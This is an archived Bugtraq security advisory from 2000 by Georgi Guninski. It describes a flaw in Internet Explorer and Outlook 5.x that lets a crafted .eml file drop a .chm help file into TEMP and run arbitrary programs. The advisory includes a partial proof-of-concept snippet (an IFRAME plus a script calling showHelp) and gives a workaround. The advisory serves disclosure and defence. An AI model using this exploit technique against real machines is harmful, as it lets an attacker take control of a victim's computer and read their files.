[14289] in bugtraq
IE and Outlook 5.x allow executing arbitrary programs using .eml
daemon@ATHENA.MIT.EDU (Georgi Guninski)
Wed Mar 15 00:51:54 2000
Mime-Version: 1.0
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: 7bit
Message-Id: <38CE4636.56B37C06@nat.bg>
Date: Tue, 14 Mar 2000 16:01:26 +0200
Reply-To: Georgi Guninski <joro@NAT.BG>
From: Georgi Guninski <joro@NAT.BG>
X-To: Bugtraq <BUGTRAQ@SECURITYFOCUS.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Georgi Guninski security advisory #9, 2000
IE and Outlook 5.x allow executing arbitrary programs using .eml files
Disclaimer:
The opinions expressed in this advisory and program are my own and not
of any company.
The usual standard disclaimer applies, especially the fact that Georgi
Guninski is not liable for any damages caused by direct or indirect use
of the information or functionality provided by this program.
Georgi Guninski, bears NO responsibility for content or misuse of this
program or any derivatives thereof.
Description:
There is a vulnerability in IE and Outlook 5.x for Win9x/WinNT (probably
others) which allows executing arbitrary programs using .eml files.
This may be exploited when browsing web pages or openining an email
message in Outlook.
This may lead to taking control over user's computer.
It is also possible to read and send local files.
Details:
The problem is creating files in the TEMP directory with known name and
arbitrary content.
One may place a .chm file in the TEMP directory which contains the
"shortcut" command and when the .chm file is opened with the showHelp()
method programs may be executed.
This vulnerability may be exploited by HTML email message in Outlook.
The code that must be included in a .eml file is:
---------------------------------------------------------------------------------------
....
<IFRAME align=3Dbaseline alt=3D"" =
border=3D0 hspace=3D0=20
src=3D"cid:000701bf8458$eb570380$dc0732d4@bbb"></IFRAME>
<SCRIPT>
setTimeout('window.showHelp("c:/windows/temp/abcde.chm");',1000);
setTimeout('window.showHelp("c:/temp/abcde.chm");',1000);
</SCRIPT>
.....
------=_NextPart_000_0008_01BF8469.AEE8FB40
Content-Type: application/binary;
name="abcde.chm"
Content-Transfer-Encoding: base64
Content-ID: <000701bf8458$eb570380$dc0732d4@bbb>
...Put the base64 encoded .chm file here...
------=_NextPart_000_0008_01BF8469.AEE8FB40--
---------------------------------------------------------------------------------------
Demonstration which starts Wordpad:
http://www.nat.bg/~joro/eml.html
Workaround: Disable Active Scripting.
Copyright 2000 Georgi Guninski
Regards,
Georgi Guninski
http://www.nat.bg/~joro
